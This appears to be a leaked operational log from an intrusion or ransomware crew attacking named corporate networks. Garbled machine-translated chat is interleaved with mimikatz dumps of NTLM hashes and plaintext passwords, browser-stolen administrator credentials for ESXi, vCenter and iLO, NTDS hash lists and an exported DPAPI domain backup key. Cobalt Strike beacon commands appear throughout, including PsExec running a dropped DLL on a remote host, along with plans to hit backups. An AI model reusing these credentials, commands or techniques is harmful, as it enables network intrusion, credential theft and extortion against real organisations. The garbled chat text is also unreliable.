	 * Username : LENDING3$
	 * Domain : NORTHERNTRUST
	 * Password : (null)
	kerberos :
	 * Username : LENDING3$
	 * Domain : Northerntrust.local
	 * Password : Y*]ozx%Vn)_$N%@t0+9SfI[##r8_XVQFz<67Q<[,s*zd9kQDG<Yi P+Rr%]S -mSwUlw.!]M1+@e6fC_46 "ijP3h u':E1$/?(DdI BiZfQb0Z;#qg L0^_*
	ssp :
	credman :

Authentication Id : 0 ; 49661033 (00000000:02f5c469)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 10/3/2020 9:56:39 AM
SID : S-1-5-96-0-2
	msv :
	 [00000003] Primary
	 * Primary : Username : LENDING3$
	 * Domain : NORTHERNTRUST
	 * NTLM : 102434085c8a288797aec02654f619e3
	 * SHA1 : ce51afe3ab35b5e630f28da5f0f36a507b30e2bf
	tspkg :
	wdigest :
	 * Username : LENDING3$
	 * Domain : NORTHERNTRUST
	 * Password : (null)
	kerberos :
	 * Username : LENDING3$
	 * Domain : Northerntrust.local
	 * Password : Y*]ozx%Vn)_$N%@t0+9SfI[##r8_XVQFz<67Q<[,s*zd9kQDG<Yi P+Rr%]S -mSwUlw.!]M1+@e6fC_46 "ijP3h u':E1$/?(DdI BiZfQb0Z;#qg L0^_*
	ssp :
	credman :

Authentication Id : 0 ; 48011904 (00000000:02dc9a80)
Session : Interactive from 1
User Name : ehart
Domain : NORTHERNTRUST
Logon Server : DC1
Logon Time : 10/3/2020 9:53:49 AM
SID : S-1-5-21-1968562247-2146563082-3767082923-2105
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 48011793 (00000000:02dc9a11)
Session : Interactive from 1
User Name : ehart
Domain : NORTHERNTRUST
Logon Server : DC1
Logon Time : 10/3/2020 9:53:49 AM
SID : S-1-5-21-1968562247-2146563082-3767082923-2105
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 9/30/2020 10:27:35 AM
SID : S-1-5-19
	msv :
	tspkg :
	wdigest :
	 * Username : (null)
	 * Domain : (null)
	 * Password : (null)
	* kerberos :
	 * Username : (null)
	 * Domain : (null)
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : LENDING3$
Domain : NORTHERNTRUST
Logon Server : (null)
Logon Time : 9/30/2020 10:27:33 AM
SID : S-1-5-20
	msv :
	 [00000003] Primary
	 * Username : LENDING3$
	 * Domain : NORTHERNTRUST
	 * NTLM : 102434085c8a288797aec02654f619e3
	 * SHA1 : ce51afe3ab35b5e630f28da5f0f36a507b30e2bf
	tspkg :
	wdigest :
	 * Username : LENDING3$
	 * Domain : NORTHERNTRUST
	 * Password : (null)
	kerberos :
	 * Username : lending3$
	 * Domain : NORTHERNTRUST.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 32821 (00000000:00008035)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 9/30/2020 10:27:32 AM
SID : S-1-5-96-0-0
	msv :
	 [00000003] Primary
	 * Username : LENDING3$
	 * Domain : NORTHERNTRUST
	 * NTLM : 102434085c8a288797aec02654f619e3
	 * SHA1 : ce51afe3ab35b5e630f28da5f0f36a507b30e2bf
	tspkg :
	wdigest :
	 * Username : LENDING3$
	 * Domain : NORTHERNTRUST
	 * Password : (null)
	kerberos :
	 * Username : LENDING3$
	 * Domain : Northerntrust.local
	 * Password : Y*]ozx%Vn)_$N%@t0+9SfI[##r8_XVQFz<67Q<[,s*zd9kQDG<Yi P+Rr%]S -mSwUlw.!]M1+@e6fC_46 "ijP3h u':E1$/?(DdI BiZfQb0Z;#qg L0^_*
	ssp :
	credman :

Authentication Id : 0 ; 31218 (00000000:000079f2)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 9/30/2020 10:27:31 AM
SID :
	msv :
	 [00000003] Primary
	 * Primary : Username : LENDING3$
	 * Domain : NORTHERNTRUST
	 * NTLM : 102434085c8a288797aec02654f619e3
	 * SHA1 : ce51afe3ab35b5e630f28da5f0f36a507b30e2bf
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : LENDING3$
Domain : NORTHERNTRUST
Logon Server : (null)
Logon Time : 9/30/2020 10:27:31 AM
SID : S-1-5-18
	msv :
	tspkg :
	wdigest :
	 * Username : LENDING3$
	 * Domain : NORTHERNTRUST
	 * Password : (null)
	kerberos :
	 * Username : lending3$
	 * Domain : NORTHERNTRUST.LOCAL
	 * Password : (null)
	ssp :
	credman :
``````
The request will be processed at a domain controller for domain Northerntrust.local.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator ehart ghawkins
networkservices rbradley spayne
The command completed successfully.

The request will be processed at a domain controller for domain Northerntrust.local.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator ehart ghawkins
networkservices rbradley spayne
The command completed successfully.

Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
NORTHERNTRUST\Domain Admins
NORTHERNTRUST\fgarbo
OOB
setup
The command completed successfully.


````\\\192.168.168.5\swswshare` Checking the system for Credits. The ones I found aren't valid. Checked ms17 empty.
```
	 * Username : Administrator
	 * NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0 zero


	 * Username : Linux
	 * NTLM : c40ce4eab245d09bead615fd67e59a77 wrong HASH
	 * Password : Pack5156
``````
User name linux
Full Name Linux
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 6/12/2014 11:20:21 AM
Password expires Never
Password changeable 6/13/2014 11:20:21 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/16/2020 2:06:23 PM

Logon hours allowed All

Local Group Memberships *Administrators
Global Group memberships *Group Policy Creator *Domain Admins
                             *Enterprise Admins *Domain Users
                             *Schema Admins
The command completed successfully.

``user3pkgprod.com and mappi can already pull all the serversIn 10 min we beginnuans repeats the bild gave outnu all backups, saturation and file storage in the first place on the servers mappi armydns and dk in the last place aha well then in snoslinvin or lin disk?and where are the snaps? yes, everything is as it always is. By the way, according to the classics you know yes? in 10 minutes we will start the second one, we will leave it for the second network to the servers with only 67 servers, we take 1 koba to work okey it's true that there was no pass)
before the browser was taken off then what's the problem? :D no login in general only pass ahah()) no guess? root/admin/domain name
--- Chromium Credential (User: mattpeterson) ---
URL : https://z1trendmicro.gophersport.local:4343/SMB/console/html/cgi/cgiChkMasterPwd.exe
Username :
Password : Pr0stretch
``2 coba take the job,`` I wouldn't say so,`` they say two of you can handle it,`` well,the admin was on the surface,`` and the center was found,`` and so was the center.
the ecix was also found
ave admin found `POIODJFUIHGYSDIUfG *YSgfyewi76GSFTSYTEgjuf you ready? check the availability of snaps, etc? 15 minutes ``
http://z1trendmicro.gophersport.local:8059/SMB/console/html/cgi/cgiChkMasterPwd.exe
Pr0stretch
`` In 50 min start on the ad67/312ok, waiting for status) let me open all that will open and write, otherwise I get confused again) by hell how many servers and armies? no. in the browser say that the coba you pull ... I opened part of the ip, and some of the names and the fuck to distinguish between one or different reopen ...? I now reopen again, otherwise confused) the question is what kind of virtuals?it's not enough I mean there are 10 pcs how many servers and arms, and the network is small? virtualIt's a bit small ... in an hour will start? it does not seem that applies to the domain proliant? of those that did not come part of it seems not configured4 came up with a total of 9 linespodoshen at least 1 or all for nothing? check the creeds at least give us a sign of life?
--- Chromium Credential (User: mattpeterson) ---
URL : https://z2dc1esxi2.gophersport.local/ui/
Username : root
Password : PowerPlay1947
URL : https://z2dc1esxi1.gophersport.local/ui/
Username : root
Password : PowerPlay1947
URL : https://vc-z2dc1.gophersport.local/websso/SAML2/SSO/vsphere.local
Username : administrator@vsphere.local
Password : Victory1947!
URL : https://z2dc1esxi3.gophersport.local/ui/
Username : root
Password : PowerPlay1947
URL : https://z1esxi1-ilo.gophersport.local/html/login.html
Username : admin
Password : Genesis1947
Just in time for the final test, we still have 2 hours to go. Then you can take it from there, I think? All 4 of 6.
--- Chromium Credential (User: mattpeterson) ---
URL : https://z1esxi1.gophersport.local/ui/
Username : GOPHERSPORT\mattpeterson
Password : A101011a45!

``Maybe it's not on my dc, either.``
--- Chromium Credential (User: mattpeterson) ---
URL : https://vc-z2dc1.gophersport.local:5480/
Username : root
Password : SuperNova1947!
``````--- Chromium Credential (User: mattpeterson) ---
URL : https://ilo2m24422ldx.gophersport.local/html/login.html
Username : admin
Password : Genesis1947 ``from here, maybe as soon as all the spheres and more will be added to the collection ``.
URL : https://vc-z2dc1.gophersport.local/websso/SAML2/SSO/vsphere.local
Username : gophersport\mattpeterson
Password : A101011a43
``@user4 your way outgodny)yes it's faster than that)))) took the sharkchromiumromomo just /unprotect from his process by the way you can now pull out his masterkey on dpapi run)@user9 once we on his tachka then logonpassesbelts first browsers can there his clearing from systems can in winlogon and remove logonpasses will fall off without the ability to re-propel it, but it was taken off
also out of context
i thought you needed the sitel from the system to see the history of users and so on.
i thought about sharpchromium to remove them there's a trick with dpapi from his context to remove ... yes, it is understandablethere vyytilsya not inject the usual https if the session highlighted in green in general in tempeya would immediately remove the sitbelt this bindpipe there is no other way to put it i did not even try to jumper there because.it's a bindpipe here i didn't even try to jumper there because it didn't work anywhere can jump it in the window) in the fucking cob did you try to jumper there? but i fixed it when i requested it in tpsh
Exception calling "DownloadString" with "1" argument(s): "The remote server returned an error: (403) Forbidden."

You were right about the whitelist) With your masterkeys, your login date is also not decrypted, it may be a problem with the steitelist.
statekeys

The statekeys command will search for Chrome/Edge AES statekey files (i.e. 'AppData\Local\Google\Chrome\User Data\Local State' and 'AppData\Local\Microsoft\Edge\User Data\Local State') and decrypt them using the same type of arguments that can be supplied for cookies and logins.

State keys can also be decrypted with a) any "{GUID}:SHA1 {GUID}:SHA1 ..." masterkeys passed, b) a /mkfile:FILE of one or more {GUID}:SHA1 masterkey mappings, c) a supplied DPAPI domain backup key (/pvk:BASE64... or /pvk:key.pvk) to first decrypt any user masterkeys, or d) a /password:X to decrypt any user masterkeys, which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with Mimikatz' sekurlsa::dpapi command.

If run from an elevated context, state keys for ALL users will be triaged, otherwise only state keys for the current user will be processed.
``this thinghttp://github.com/GhostPack/SharpDPAPI#vautltstsdawaiI can just remove the masterkey without dk, how can I remove it?)
it comes with dk can you remove the pvk file locally yourself? no, we have no dk at all show ``mimikatz # dpapi::chrome /in: "Login Data" /unprotect`` worked with it try /unprotectd? a stopda it was me trying to get my creeds out``
mimikatz # dpapi::chrome /in: "C:\Users\Administrator\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"
> Encrypted Key found in local state file
> Encrypted Key seems to be protected by DPAPI

URL : https://www.pizzahut.com/ ( https://www.pizzahut.com/index.php )
Username : uzxmvlcsyosjluxudo@upived.online
ERROR kuhl_m_dpapi_chrome_decrypt ; No Alg and/or Key handle despite AES encryption
https://github.com/twelvesec/passcathttps://github.com/djhohnstein/SharpChromiumпопробовал with both open and closed browsers, just in case I didn't find any, none came up (will it find your accesses? https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1 is it on? did you save the accesses? saved them, got it, just sign up and save the accesses in the browser, what accesses? with mimic? and save the accesses somewhere put it on, but no problem download) do you have ej on the deck? I have the same thing
URL : https://norex.growthzoneapp.com/ ( https://norex.growthzoneapp.com/ap/Events/Register/yr4Y1Rop )
Username : mattpeterson@gophersport.com
ERROR kuhl_m_dpapi_chrome_decrypt ; No Alg and/or Key handle despite AES encryption
``No key came up (not yet? 2 left to do with @user4? I don't see it anymore) and I didn't do it through f7ae192f-64d6-41fa-41fa-a58a-ab726048ad7bol[ ](https://mediaeveryone.com/group/gophersport-com?msg=Mns5nepoJGuGZKiyn) I did everything through which guid?
Through this -``.
 f7ae192f-64d6-41fa-a58a-ab726048ad7b
```
or what do you mean? which one did you go through -``?
[domainkey] with RSA private key
  key : 75597592e90e408290b2e532ed2015557eec0d4296b4517babd2e9ac26c4599cb1b23e13a3a0ba08e5ea951c69a6d773e629a37837db02ddbbf449c207bb960e
  sha1: adf71515a86e4350f103949a74d8ab9cace0237b
  sid : S-1-5-21-1434170147-1247748403-2213390517-18832

``````
sha1: 3271ea02988401e642deda7ca35b0503ec2ba7d1
sha1: f3f2faac309b0dfa98170f1a472493c7c42e0a3c
sha1: 3a048c41afa9f7d99d80a8c3b4d894f165a2f8fa
sha1: 5fc489d886bdceb4279e553361552c9910bc3d41
sha1: 0aa6cd2493ace9e5a41a22989b9cab7bfe93c857
sha1: adf71515a86e4350f103949a74d8ab9cace0237b
``All six of them and drop the result first``.
mimikatz # dpapi::masterkey /in:b8854128-023c-433d-aac9-232b4bca414c /pvk:ntds_capi_0_32d021e7-ab1c-4877-af06-80473ca3e4d8.pvk
make a backup of the logindata do sysid remain alone just go through 6 guid) download all the files + the latest mimic on the dediktut even easier + we need to drop them on the dediktut and there decrypt as I understand
and + need to know under which guid he went to herdj took his guid on the screenshot 1190 we have about 1kbd like 1 and that's too small he needs .pvk, and there's some not so .pvkclean the filesbudozhesti know yeah, I just lost those files, wanted to dump the key in another folder)[ ](https://mediaeveryone.com/group/gophersport-com?msg=5z4u65pjDnrgX6Qs8) you about whattakaya hat a lot of noise1 times would be enoughbut do not do it more do not do it with the domain to write?) not. prerdedelas)) and so, and then nothing:zany_face:cheater) aha and from there on the dk did? you directly to dk opened a session here I had, and on dk worked errors How? on dk z1ad2 ``
beacon> mimikatz !lsadump::backupkeys /system:z1ad2.gophersport.local /export
[*] Tasked beacon to run mimikatz's !lsadump::backupkeys /system:z1ad2.gophersport.local /export command
[+] host called home, sent: 706126 bytes
[+] received output:

Current prefered key: {90818d1b-d373-4b74-b25c-76385e8c2987}
  * RSA key
	|Provider name : Microsoft Strong Cryptographic Provider
	|Unique name :
	|Implementation : CRYPT_IMPL_SOFTWARE ;
	Algorithm : CALG_RSA_KEYX
	Key size : 2048 (0x00000800)
	Key permissions: 0000003f ( CRYPT_ENCRYPT ; CRYPT_DECRYPT ; CRYPT_EXPORT ; CRYPT_READ ; CRYPT_WRITE ; CRYPT_MAC ; )
	Exportable key : YES
	Private export : OK - 'ntds_capi_0_90818d1b-d373-4b74-b25c-76385e8c2987.keyx.rsa.pvk'
	PFX container : OK - 'ntds_capi_0_90818d1b-d373-4b74-b25c-76385e8c2987.pfx'
	Export : OK - 'ntds_capi_0_90818d1b-d373-4b74-b25c-76385e8c2987.der'

Compatibility prefered key: {bceb968a-8d19-4055-874d-2a38a1e7c2e6}
  * Legacy key
635eaf2d4ac8a48f68c71968732b556aa65b5b0e475e628b7613b7adca8c89af
f3c45fad93e7b9053e9ddd98276eb16c7af9f02116ebf3018552aca7b23e8f70
0054316bcc3a3aca201277abf1f7c24ded29f93217cb0ce6f74ee1c05be4eed9
cfcf00218ec6411d451ff1b06ea835b90b6f3f0bb2ae9967b40e5bc3034a89d2
ae584cb3eb58fe0465380a9d60768f5a5bec88f12ee9ee1532e2094f8094ec3f
ce87dc29d0ef39456afeb1385be0ee01ab232eb2c74fa8b2840e477f95c82d4d
e30a643dff5af61c7e3bbfc5227392998c3c7fadda30942594b6639d333bce74
053a4d3aab8cdd790f7152676276d9a2a1ef4d01eae30a166bdb92089d0a568f

	Export : OK - 'ntds_legacy_0_bceb968a-8d19-4055-874d-2a38a1e7c2e6.key'

``````
ilo2m24422ldv.gophersport.local
```
no infernal comp
```
(ICMP) Target '10.1.0.86' is alive. [read 8 bytes]
10.1.0.86:443
10.1.0.86:22 (SSH-2.0-mpSSH_0.2.1)

[+] received output:
Scanner module is complete
``Till now run at least 12 no. well dunno. they are like this ``https://ilo2m24422ldv.gophersport.local/z1DC1ESXi2``)) except for two all are there?
z2dc1esxi2.gophersport.local +
z2dc1esxi1.gophersport.local +
vc-z2dc1.gophersport.local +
z2dc1esxi3.gophersport.local +
z1dc1esxi1.gophersport.local +
z1dc1esxi3.gophersport.local
z1dc1esxi2.gophersport.local
z1esxi1.gophersport.local +
vcz1dc1.gophersport.local +
``````
z2dc1esxi2.gophersport.local
z2dc1esxi1.gophersport.local
vc-z2dc1.gophersport.local
z2dc1esxi3.gophersport.local
z1dc1esxi1.gophersport.local
z1dc1esxi3.gophersport.local
z1dc1esxi2.gophersport.local
z1esxi1.gophersport.local
vcz1dc1.gophersport.local
``Check the names of the nixes against the history it has 9 nixes available in ad_com, and half +- have a web face of the sphere```.
Pinging vc-z2dc1.gophersport.local [10.2.1.10] with 32 bytes of data:
Reply from 10.2.1.10: bytes=32 time=5ms TTL=62

Ping statistics for 10.2.1.10:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 5ms, Maximum = 5ms, Average = 5ms

beacon> shell ping -n 1 vcz1dc1
[*] Tasked beacon to run: ping -n 1 vcz1dc1
[+] host called home, sent: 49 bytes
[+] received output:

Pinging vcz1dc1.gophersport.local [10.10.0.128] with 32 bytes of data:
Reply from 10.10.0.128: bytes=32 time=1ms TTL=64

Ping statistics for 10.10.0.128:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 1ms, Maximum = 1ms, Average = 1ms

good question)is it 2 systems? vc-z2dc1 and why does it have 2 hosts vcz1dc1brute the bindings do not brute-force to root onlyahaa it sqlite file above i think i threw - from ezhak what login date? and the browser is also stupidxz it from login data filea i did not understand there are 2 pcs?you are in? only 1 time do not change the combination so there is no trace of previous entries after each time reset the browser understood1 times in the sphere where? throw the juice and try them on the input ``
backup Sunny2day
ilssql rehpog2013
schtask rehpog2013!
symbackup rehpog2013!
trackit rehpog2013
veeambackup rehpog2013!
erictitchenal P0w3r!23
``+they overlap. all ea is yes too or are they all YES and the first 4 are EA+DA?
-------------------------------------------------------------------------------
Administrator backup erictitchenal
ilssql mattpeterson o365sync
schtask symbackup trackit
veeambackup veeamone watchguard
``Everything really YES?
only if mimic is purely for chrome?
EA

gophersport.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:d3d9577759c6e39fb2ab8ae5528df13d:::
gophersport.com\erictitchenal:1110:aad3b435b51404eeaad3b435b51404ee:8ce83e3573f736f6fd0ca4a54f0c0f15:::
gophersport.com\mattpeterson:18832:aad3b435b51404eeaad3b435b51404ee:e17058726782234e52301c78b6391291:::
gophersport.com\o365sync:22200:aad3b435b51404eeaad3b435b51404ee:c1569f38de1cf528960da50b871c5e6d:::

DA

gophersport.local\backup:2690:aad3b435b51404eeaad3b435b51404ee:70d306f9d204e0f722eb888946fcd9b6:::
gophersport.local\ilssql:18921:aad3b435b51404eeaad3b435b51404ee:6bfc458ce5730961818c7a9e7a80a74a:::
gophersport.local\schtask:18853:aad3b435b51404eeaad3b435b51404ee:aac86ad4320f7cca879a87724c7d3647:::
gophersport.local\symbackup:2823:aad3b435b51404eeaad3b435b51404ee:aac86ad4320f7cca879a87724c7d3647:::
gophersport.local\trackit:18916:aad3b435b51404eeaad3b435b51404ee:6bfc458ce5730961818c7a9e7a80a74a:::
gophersport.com\veeambackup:21169:aad3b435b51404eeaad3b435b51404ee:aac86ad4320f7cca879a87724c7d3647:::
gophersport.com\veeamone:21273:aad3b435b51404eeaad3b435b51404ee:2985a0d62f9ca5d79a0338869f2e3ddd:::
gophersport.local\watchguard:22112:aad3b435b51404eeaad3b435b51404ee:ae57d4b597add63fbb88b380465d592a:::
and as a consequence, the way they store access is the same as the latest version of the hedgehog on the chrome engine to communicate with people as I understand the article in question about chrome
or does mimic take everything on chrome?

6984153 beacon> shell PsExec64.exe \\10.10.0.38 -accepteula -s -d rundll32 C:\windows\temp\ccs.dll entryPoint
[*] Tasked beacon to run: PsExec64.exe \\10.10.0.38 -accepteula -s -d rundll32 C:\windows\temp\ccs.dll entryPoint
[+] host called home, sent: 118 bytes
[+] received output:

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

``buttshttp://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/[ ](https://mediaeveryone.com/group/gophersport-com?msg=YXhdLJWYw4oW92LS6) let me throw you a list of hashes of all EAs, yes, yes, I didn't think so let's do it but the traffic is not pinging to my coba hardly if the admin has whitelist ip, so sessions are not flying, but z1gateway is on the whitelist
maybe we can pull z1gateway and try to pimp the admin's comp? what, are we gonna fuck around with masterkeys? as long as we don't do anything without me for reviewinghttp://githubThe main thing is that you can't do anything without me, but you can't do anything without me, you can't do anything without me, you can't do anything without me, you can't do anything without me, you can't do anything without me, you can't do anything without me, you can't do anything without me, you can't do anything without me, you can't do anything without me, you can't do anything without me, you can't do anything without me, you can't do anything without me, you can't do anything without me, you can't do anything without me.

Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title
========================= ======== ================ =========== ============ =============== ================================================== ============ ========================================================================
System Idle Process              0 Services                   0          4 K Unknown         NT AUTHORITY\SYSTEM                                   253:00:03 N/A                                                                     
System                           4 Services                   0        140 K Unknown         N/A                                                     0:05:31 N/A                                                                     
smss.exe                       208 Services                   0        732 K Unknown         NT AUTHORITY\SYSTEM                                     0:00:00 N/A                                                                     
csrss.exe                      316 Services                   0      3,268 K Unknown         NT AUTHORITY\SYSTEM                                     0:00:01 N/A                                                                     
csrss.exe                      368 Console                    1      2,716 K Unknown         NT AUTHORITY\SYSTEM                                     0:00:00 N/A                                                                     
wininit.exe                    376 Services                   0      3,236 K Unknown         NT AUTHORITY\SYSTEM                                     0:00:00 N/A                                                                     
winlogon.exe                   404 Console                    1      4,992 K Unknown         NT AUTHORITY\SYSTEM                                     0:00:00 N/A                                                                     
services.exe                   464 Services                   0      8,188 K Unknown         NT AUTHORITY\SYSTEM                                     0:00:16 N/A                                                                     
lsass.exe                      472 Services                   0     14,920 K Unknown         NT AUTHORITY\SYSTEM                                     0:02:16 N/A                                                                     
svchost.exe                    528 Services                   0      7,568 K Unknown         NT AUTHORITY\SYSTEM                                     0:00:01 N/A                                                                     
svchost.exe                    556 Services                   0      6,604 K Unknown         NT AUTHORITY\NETWORK SERVICE                            0:00:11 N/A                                                                     
LogonUI.exe                    660 Console                    1     25,036 K Unknown         NT AUTHORITY\SYSTEM                                     0:00:00 N/A                                                                     
dwm.exe                        676 Console                    1      8,512 K Unknown         Window Manager\DWM-1                                    0:00:00 N/A                                                                     
svchost.exe                    684 Services                   0     15,208 K Unknown         NT AUTHORITY\LOCAL SERVICE                              0:03:35 N/A                                                                     
svchost.exe                    716 Services                   0     36,956 K Unknown         NT AUTHORITY\SYSTEM                                     0:16:58 N/A                                                                     
svchost.exe                    780 Services                   0     11,768 K Unknown         NT AUTHORITY\LOCAL SERVICE                              0:00:02 N/A                                                                     
svchost.exe                    896 Services                   0     18,136 K Unknown         NT AUTHORITY\NETWORK SERVICE                            0:00:24 N/A                                                                     
svchost.exe                    324 Services                   0     12,124 K Unknown         NT AUTHORITY\LOCAL SERVICE                              0:00:00 N/A                                                                     
spoolsv.exe                   1028 Services                   0      7,688 K Unknown         NT AUTHORITY\SYSTEM                                     0:00:06 N/A                                                                     
svchost.exe                   1060 Services                   0      6,204 K Unknown         NT AUTHORITY\SYSTEM                                     0:00:00 N/A                                                                     
svchost.exe                   1080 Services                   0      2,232 K Unknown         NT AUTHORITY\SYSTEM                                     0:00:00 N/A                                                                     
inetinfo.exe                  1096 Services                   0      6,456 K Unknown         NT AUTHORITY\SYSTEM                                     0:00:00 N/A                                                                     
svchost.exe                   1140 Services                   0      2,324 K Unknown         NT AUTHORITY\NETWORK SERVICE                            0:00:00 N/A                                                                     
snmp.exe                      1184 Services                   0      4,420 K Unknown         NT AUTHORITY\SYSTEM                                     0:00:02 N/A                                                                     
svchost.exe                   1204 Services                   0     16,084 K Unknown         NT AUTHORITY\NETWORK SERVICE                            0:00:01 N/A                                                                     
svchost.exe                   1220 Services                   0     11,516 K Unknown         NT AUTHORITY\SYSTEM                                     0:00:00 N/A                                                                     
VGAuthService.exe             1280 Services                   0     10,368 K Unknown         NT AUTHORITY\SYSTEM                                     0:00:00 N/A                                                                     
vmtoolsd.exe                  1496 Services                   0      6,592 K Unknown         NT AUTHORITY\SYSTEM                                     0:05:28 N/A                                                                     
svchost.exe                   1512 Services                   0      2,660 K Unknown         NT AUTHORITY\SYSTEM                                     0:00:00 N/A                                                                     
svchost.exe                   1720 Services                   0     12,200 K Unknown         NT AUTHORITY\NETWORK SERVICE                            0:00:02 N/A                                                                     
svchost.exe                   1920 Services                   0      4,848 K Unknown         NT AUTHORITY\NETWORK SERVICE                            0:00:00 N/A                                                                     
WmiPrvSE.exe                  1316 Services                   0     18,976 K Unknown         NT AUTHORITY\NETWORK SERVICE                            0:12:25 N/A                                                                     
msdtc.exe                     2256 Services                   0      7,324 K Unknown         NT AUTHORITY\NETWORK SERVICE                            0:00:00 N/A                                                                     
iashost.exe                   1940 Services                   0     14,096 K Unknown         NT AUTHORITY\NETWORK SERVICE                            0:00:00 N/A                                                                     
svchost.exe                   2976 Services                   0      3,112 K Unknown         NT AUTHORITY\NETWORK SERVICE                            0:00:00 N/A                                                                     
svchost.exe                   2716 Services                   0     16,604 K Unknown         NT AUTHORITY\NETWORK SERVICE                            0:16:58 N/A                                                                     
w3wp.exe                      3528 Services                   0     12,588 K Unknown         IIS APPPOOL\DefaultAppPool                              0:00:02 N/A                                                                     
PSEXESVC.exe                  2484 Services                   0      4,448 K Unknown         NT AUTHORITY\SYSTEM                                     0:00:00 N/A                                                                     
tasklist.exe                   416 Services                   0      6,024 K Unknown         GOPHERSPORT\mattpeterson                                0:00:00 N/A                                                                     
conhost.exe                   2184 Services                   0      3,212 K Unknown         GOPHERSPORT\mattpeterson                                0:00:00 N/A
``List of processes from this host ``10.22.0.13:3389 z1gateway:51889 ``drop the netstat see where it's coming from at allHowever its clears, if we have pseksek, maybe try parsing access via rdp and go via rdp? Come on, can I not encrypt? Well I sent encrypted already I'm running time you want ptsh paiload to send via pseksek
in bass64 is too long.
not encrypted can be shot? not arrived, i am waiting for yamisclick first...don't get it?
6984153 beacon> desktop
``and use the original use it only to test the openness of the psek4) the built-in psek is crap it's virtualkaon is connected via rdp``
msedge.exe 10864 RDP-Tcp#1
``notice 3) exel closed:skull_crossbones:2) his pk1) yes he has ejesnetone once accepted,``the system cannot find the file specified.accep? can`t you really see the difference?
The system cannot find the path specified.

but i just check it a hundred times and it's slow working for you)) ahahahahmb you tricked me and put in x32? fixed the fuck) i do not understand what path it does not find?
```
The system cannot find the path specified.

``To try it without specifying the path, why was it with:``Windows\System32\PsExec.ehe already filled in the ehe a long time ago and hasn't been used yet You are sitting for a long time all, not at all) and what does /q have to do with it? Ah, we kind of specified /q51B↩agreed)``
-d Don't wait for process to terminate (non-interactive).
``So psekk has no such flags like that in the spirit of non-interactive, do not forget to put more flags because tasklist is just a step on the job and not the main goal of psekk.exe maybe? this switch is mandatory `` -d
-Run the remote process in the system account.
``of the alternatives we will have rdno rewire with the original and a direct indication of the credo is not 100% info this is my versiona service itself on the pc does not have anything on it go rights your DA You have the rights to create SERVICE on the pcdatak we under the token yes, the cool we break for the simple reason that the current access level service dull has no rights to system utilities transference to the classical `` ``
https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
``[ ](https://mediaeveryone.com/group/gophersport-com?msg=3L8BEgbwNBZDnpGqp) from servsynyh which YES is it? not aklyr it is not? file is also empty, under its tokenzakilu part of the sessions in sliptoken reworked because it seems the domain is not so specified now, earlier in the day still) aaaa who second did xox 11) see that you rework your tokens on several times (why?)
2) you have DOHU and above sessions active in the cob (you do know you're making a fuckin' noise, right?)
3) why 2 active sox? what are you doing?
185.150.190.113:61718
O5xFflqqDG7LDQJUDbdtkj54zQ8QDVMMI0W
give him access to the working coba and check the list of processes again make him a tokennea, under a different daub under his context? well, he must have it open - not everything will pack up the folder better takeEtoo? take his hedgehog data analogously without a dllki? no pour on the admin one? try 2[ ](https://mediaeveryone.com/group/gophersport-com?msg=uTozKnN64N9AWsJk3) there is shit with the session. nothing works there at alla, now user4 will come and say
smoke a cigarette [ ] (https://mediaeveryone.com/group/gophersport-com?msg=wwPwFNqg5yJxjZaQj) it's always shown that there's an rdp what's the problem?
i'm confused)) and before that what was the error?[ ](https://mediaeveryone.com/group/gophersport-com?msg=TrfowtY6WQK9gbMRb) alm, see) but i'll try[ ](https://mediaeveryone.com/group/gophersport-com?msg=R6wA7KnkExRHJg5Ry) and how he saw the rdp if you previously threw a scan where he writes that he does not see? i do not think that fit, all armas have different passwords check them on the file) they have such things on armas in ad_com
```
>ms-Mcs-AdmPwd: 0H2uIoO96Y7lmo
>ms-Mcs-AdmPwdExpirationTime: 132430931771575287
they are in hell there is, like, a password from the LA admin pkkstahey have no password, then the service accounts do not rolled? there is a file xlsx with passwords from it, but password protected) sometimes appear in the network
there's an xlsx file, but it's password protected) sometimes they show up on the net
stask, rps are not available
he's got two laptops connected to hell, the second one is kind of dull.
there is his car but it is empty while we look for more adminski stask probably covered by a firewallgrs not available vmik not working? adminski cars see ports z1print? or adminski cars? yes you on this watchguard? so stopotlichno)) lf` with Z1WATCHGUARD see 445,3389,139` approval? user4 will pull up, check it
